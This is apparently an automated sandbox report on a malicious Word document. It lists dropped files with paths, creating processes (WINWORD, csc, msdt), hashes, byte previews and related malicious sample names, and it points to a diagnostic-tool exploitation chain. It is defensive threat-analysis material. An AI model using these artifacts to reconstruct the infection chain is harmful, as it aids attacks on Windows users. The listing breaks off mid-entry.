                                                                                                                                                                                                      SHA-256:14D6C6AEBB63656618400FF9A3B2AB53F2B796A57A1F8826D08E04E022C89535
                                                                                                                                                                                                      SHA-512:289E74DCEB35A7D33D1B3678E59A96F87F59F4DF476641ED8E89B17AFF4B1DDE6235A820724BDD20F3614DB62E9E9A3D0C657A048E65F8C205F821855CBE6ACD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP................._...l<."..%.8...........4.......C:\Users\user\AppData\Local\Temp\RES67B5.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.h.g.y.c.n.j.1...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES7E0C.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.107543091783012
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:HHiC9A++fS37SDfHdWhKRVg5fII+ycuZhNhfakSIYPNnq9Wd:Ax/9MKTg5g1ulhfa3Igq9m
                                                                                                                                                                                                      MD5:230154DD29F686AA4F6F4A644F5F5590
                                                                                                                                                                                                      SHA1:C30DC444975F3DE2E5F4663D32DCF0955F2572EE
                                                                                                                                                                                                      SHA-256:97AE240600AD815D5E225554CEA752F3BFE2239574F3A96CE5CC0068BC4C7535
                                                                                                                                                                                                      SHA-512:EB7D40E9FD1B4BCFEB10C9853DC5ED3360C2C1E5C053971B21A950391EA2C12B4141E03A8C7FF1A954B2C115844A122C7E2E72687BB5C0C89E749F5159FC8B47
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP...............><}......P...8;..........4.......C:\Users\user\AppData\Local\Temp\RES7E0C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                      Entropy (8bit):3.1004839187935667
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybfak7YnqqIYPN5Dlq5J:+RI+ycuZhNhfakSIYPNnqX
                                                                                                                                                                                                      MD5:3E3C7D0688DEB6FD168550FCF109383B
                                                                                                                                                                                                      SHA1:0032779AC0FC1F5E0C34F871BEABCA8CE1E6F02C
                                                                                                                                                                                                      SHA-256:01D86F9F87F016A6951A9CFD6626CC6A380825C637E1B0E6590989077E1FE170
                                                                                                                                                                                                      SHA-512:3DB74ECD13DEE4F662EE7791F7BCD4854F7C821833C8C36F52A13B17ECA820F636A61B5C75A754FD2B849DD48F363C502482138FD63E685CE6D6F75DF19C8461
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                                                      Entropy (8bit):3.0882563191908634
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:6Fpqb927GslP0DRjyJ/7Vk1ulhfa3Igq:Hc7GmRnLK
                                                                                                                                                                                                      MD5:496741C3EDE413E372E16E5BCE7EF34C
                                                                                                                                                                                                      SHA1:AF4FB62FA33C35DB9100266AA4B7067284B95C74
                                                                                                                                                                                                      SHA-256:1420DB6C98A20582FF19EC21E7EB793D6C03196FFB8192B5D9F4B7848C140046
                                                                                                                                                                                                      SHA-512:DDF728E8C0ABCB36647DD652BB0763A2F3229A23AB58F40189A9B50FA9E904977B050DB6A71D43474D516BB61661126FA797C439B922986A94A3396C38EF143E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                      Entropy (8bit):3.1099724463693086
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUYak7Ynqq1NPN5Dlq5J:+RI+ycuZhNJakSHPNnqX
                                                                                                                                                                                                      MD5:E513693101D929A84E3D900EE61699DD
                                                                                                                                                                                                      SHA1:3D043E4D840618B713CD281462A70814C793E219
                                                                                                                                                                                                      SHA-256:64A976F97C37092D7077BA1D2CD047B38162D20B0D7FDF7EBC1622C5920028AA
                                                                                                                                                                                                      SHA-512:429DB24BF5AE293DAE21A5181E3AA8AB21714A1AB6729332A0922BC78191FDEAC5BF9BAF31E79BB758F42FABCE9F524C1B043AC215AEFC0DC3AE933F033B2116
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.d.5.a.k.k.d.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.d.5.a.k.k.d.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                                                      Entropy (8bit):4.798232866869047
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:sKqedmYoNKvUTCSH3gR8H8FgwSHwB8kwZYPaSJ365OxZieMjQZaeRnIjrK:1ElNK8TCSfHyP8kwZ+vKOxCQZvnr
                                                                                                                                                                                                      MD5:C197593FFC2F52FD92CBEA72E075F1A0
                                                                                                                                                                                                      SHA1:4952E8A10D35ECB33F6F4C5EB75FFABE43274C37
                                                                                                                                                                                                      SHA-256:18B5EF953D4D761AADCD20D8C76996A439FC4893E8D3BF033108D2B219160A10
                                                                                                                                                                                                      SHA-512:2A7280C552C069CB0E7CAA1AD644DFF5A30E9C1C702472E155339AA45AA0D6E385F97CA062119138FC1F7A391BB98029093F88F27344F1FC2CAE982396F2635C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                      Entropy (8bit):3.1091341615018844
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNYlYak7YnqquYlNPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
                                                                                                                                                                                                      MD5:C35FE102DC6C3CF28522BAAD25FE3885
                                                                                                                                                                                                      SHA1:EBE42FDE81A25D1EE7BD2569140906234C354F2C
                                                                                                                                                                                                      SHA-256:A68E081DD52BBB85E2533993DE83A15A3E8A08D26B062FC0831E176794709B7B
                                                                                                                                                                                                      SHA-512:CE25E9D961AECE940E454359B6A63CAEE5ED5EACCC9785EFB0CFEAAFA8D8C44F92C583CF0D3D6F83F78DDEFE783D64F4E0770CF92317986923B5452D85D14642
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.h.g.y.c.n.j.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.h.g.y.c.n.j.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):5120
                                                                                                                                                                                                      Entropy (8bit):3.783600177198582
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:6wmoPhmKraYZkH8KTibUyeUkwjj0JCxC+CFSlwYKc1ulna3rq:ntDaAkHHoZk8BCumFK
                                                                                                                                                                                                      MD5:8B796E64F83118AFDE3E9F498265CDBF
                                                                                                                                                                                                      SHA1:4416C9C664AE69132216CC2026F93324D6D5D4BD
                                                                                                                                                                                                      SHA-256:001BEA56B0790B88100C45018B064A7C53EAC2553666CFFF701BDAEFBEE92BE2
                                                                                                                                                                                                      SHA-512:BBBB59A15E665E8AEB6AED426FB944C2C6F65F65C894B193F8A77E2CDFE65E480DBF4BC22E4041DE05CA5297EC817D2017391E50450FC9CF55C7B685E158D56C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                      Entropy (8bit):4.786273488348122
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:bDuMJlMKpO1d2mxWfOO1d2v:bCAm
                                                                                                                                                                                                      MD5:22FF1DED7C768389EA5A0012AD7FFDB7
                                                                                                                                                                                                      SHA1:3C6A3F7DCF0A4DF09F1C6649D44517042797A9FC
                                                                                                                                                                                                      SHA-256:4B03CCDC4AF57995C882CEE2F0FF79078A3521735DA3976B07F3DF4A2BFB658D
                                                                                                                                                                                                      SHA-512:8011B24585EC92ED0E5A6E4806D89533DE7604BFD949B663B7EEF16EA1D40D3F93BEA03F07E04EE9D10456FE8C3D87F7EB7AF06BE515A686D79EBE5CD6182DBB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[folders]..Templates.LNK=0..qoIZSkdejM.LNK=0..[misc]..qoIZSkdejM.LNK=0..

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\qoIZSkdejM.LNK

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 12:41:32 2022, mtime=Thu Aug 18 05:34:59 2022, atime=Thu Aug 18 05:34:39 2022, length=10469, window=hide
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1060
                                                                                                                                                                                                      Entropy (8bit):4.6951658571475186
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:8CGrVDfAf/bySUAJbM5CFgDC7eV7ek7aB6m:8CGrVDfI/by+JQ54K8hB6
                                                                                                                                                                                                      MD5:0E18A3F4A8CDE9AFB2D77DF021B76C7A
                                                                                                                                                                                                      SHA1:E1C575792AA0BA797C7F08234E01E3D8A52C2810
                                                                                                                                                                                                      SHA-256:E658F5E97D803A4550CDE65F9487B68AE32742B2BA9CB7DD434E8CE6F29B1B01
                                                                                                                                                                                                      SHA-512:E0A7F1F08B6FE30352DB4C890695ECB406291DB4B1C83D987835457C6B1F90F7B8BE75BAF192DD028DE3786005654B4433AF66E9D228F1E73950816E755B5000
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L..................F.... ....;..u..........K......(...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...UL4....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......U2m..user.<.......N...UL4....#J......................n.j.o.n.e.s.....~.1......U3m..Desktop.h.......N...UL4.....Y..............>.......C.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..(...UT4 .QOIZSK~1.DOC..P.......U1m.UT4....P.....................|.u.q.o.I.Z.S.k.d.e.j.M...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\qoIZSkdejM.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.q.o.I.Z.S.k.d.e.j.M...d.o.c.x.........:..,.LB.)...As...`.......X.......910646...........!a..%.H.VZAj.... r.h............!a..%.H.VZAj.... r.h.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                                                      Entropy (8bit):2.562897579687689
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Rl/ZdMr5t9lqKZMw4uklEJltl//urh//n:RtZEOCM0X7/kx
                                                                                                                                                                                                      MD5:0E835BBF4E53576ED249E2EFEFAB70BB
                                                                                                                                                                                                      SHA1:8102488DFB784969313BD4FF14A53B0AA1EDDBBD
                                                                                                                                                                                                      SHA-256:07E9D25F2DBED077ECE447EB678EE243AEBAC9C53569F443D4E592201AAA77DD
                                                                                                                                                                                                      SHA-512:9C6A19AEA2F355E0DD44A7D071E7D657FE5E328D0FF5D9180ED6D3E79D4D5BBBA3589CC62CB15289F02546672C0689B24BB6F6CBE7491AC6C119AC89358A684A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........x..U............$.......6C......|..U....P+..P+..P+..............p..U................

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                                                      C:\Users\user\Desktop\~$IZSkdejM.docx

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                                                      Entropy (8bit):2.562897579687689
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Rl/ZdMr5t9lqKZMw4uklEJltl//urh//n:RtZEOCM0X7/kx
                                                                                                                                                                                                      MD5:0E835BBF4E53576ED249E2EFEFAB70BB
                                                                                                                                                                                                      SHA1:8102488DFB784969313BD4FF14A53B0AA1EDDBBD
                                                                                                                                                                                                      SHA-256:07E9D25F2DBED077ECE447EB678EE243AEBAC9C53569F443D4E592201AAA77DD
                                                                                                                                                                                                      SHA-512:9C6A19AEA2F355E0DD44A7D071E7D657FE5E328D0FF5D9180ED6D3E79D4D5BBBA3589CC62CB15289F02546672C0689B24BB6F6CBE7491AC6C119AC89358A684A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........x..U............$.......6C......|..U....P+..P+..P+..............p..U................

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.diagpkg

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):24702
                                                                                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):66560
                                                                                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                      • Filename: icRTA4gcSe.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: order.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: Court Fine.doc, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: 20220714 DWG.doc, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: purchase order.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: WF0SlQWKr1.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: V3g2Pfu707.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: 5YMh6S8QVr.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: ZDhoKQk8G6.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: TranQuangDai.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: 68101181_048154.img, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: doc1712.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
